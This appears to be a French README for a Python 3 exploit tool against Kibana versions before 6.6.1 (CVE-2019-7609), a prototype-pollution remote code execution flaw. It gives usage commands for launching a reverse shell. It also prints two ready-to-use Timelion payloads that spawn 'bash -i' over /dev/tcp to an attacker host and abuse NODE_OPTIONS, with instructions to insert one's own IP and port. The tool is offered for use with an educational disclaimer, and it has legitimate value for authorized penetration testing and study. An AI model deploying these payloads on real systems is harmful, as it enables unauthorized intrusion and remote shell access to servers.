
Python 3 exploit pour Kibana < 6.6.1 RCE (CVE-2019-7609) via pollution de prototype, avec détection automatique de version et reverse shell optionnel.
Auteur : LandGrey (Refactorisation Python3 par [Votre Nom])
Référence : Exploit-DB 46651
CVE : CVE-2019-7609
⚠️ Avertissement :
Ce script est destiné uniquement à des fins éducatives et de tests de pénétration autorisés. Ne l'utilisez pas sur des systèmes dont vous n'êtes pas propriétaire ou pour lesquels vous n'avez pas l'autorisation explicite de tester. L'auteur et les contributeurs ne sont pas responsables de toute utilisation abusive ou des dommages causés par cet outil.
Il s'agit d'un script d'exploit Python 3 pour la vulnérabilité d'exécution de code à distance dans Kibana versions < 6.6.1. Il exploite une faille de pollution de prototype pour exécuter des commandes arbitraires, y compris le déclenchement d'un reverse shell, sur une instance Kibana vulnérable.
python3 kibana_exploit.py -u http://target-kibana:5601
Pour déclencher un reverse shell :
python3 kibana_exploit.py -u http://target-kibana:5601 --shell -host YOUR_IP -port LISTENER_PORT
python3 kibana_exploit.py -u http://10.10.10.100:5601 --shell -host 10.10.10.200 -port 4444
requestspackagingInstallez les dépendances avec :
pip install requests packaging
Vous pouvez également exploiter cette vulnérabilité manuellement en utilisant le visualiseur Timelion de Kibana :
Payload par securityMB :
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i >& /dev/tcp/192.168.1.100/4444 0>&1");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Payload par chybeta :
.es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -c \\'bash -i>& /dev/tcp/192.168.1.100/4444 0>&1\\'");process.exit()//')
.props(label.__proto__.env.NODE_OPTIONS='--require /proc/self/environ')
Remplacez 192.168.1.100 et 4444 par votre propre IP et port d'écoute.
Le script fournit une sortie claire, étape par étape, pour la détection, la vérification et l'exploitation, ce qui le rend facile à suivre et amusant à utiliser !
Ce script est un excellent moyen d'apprendre la pollution de prototype, l'exécution de code à distance et les techniques de tests de pénétration. Utilisez-le de manière responsable et toujours avec autorisation !
Ce projet est uniquement à des fins éducatives. Aucune garantie. Hackez éthiquement, restez curieux et amusez-vous !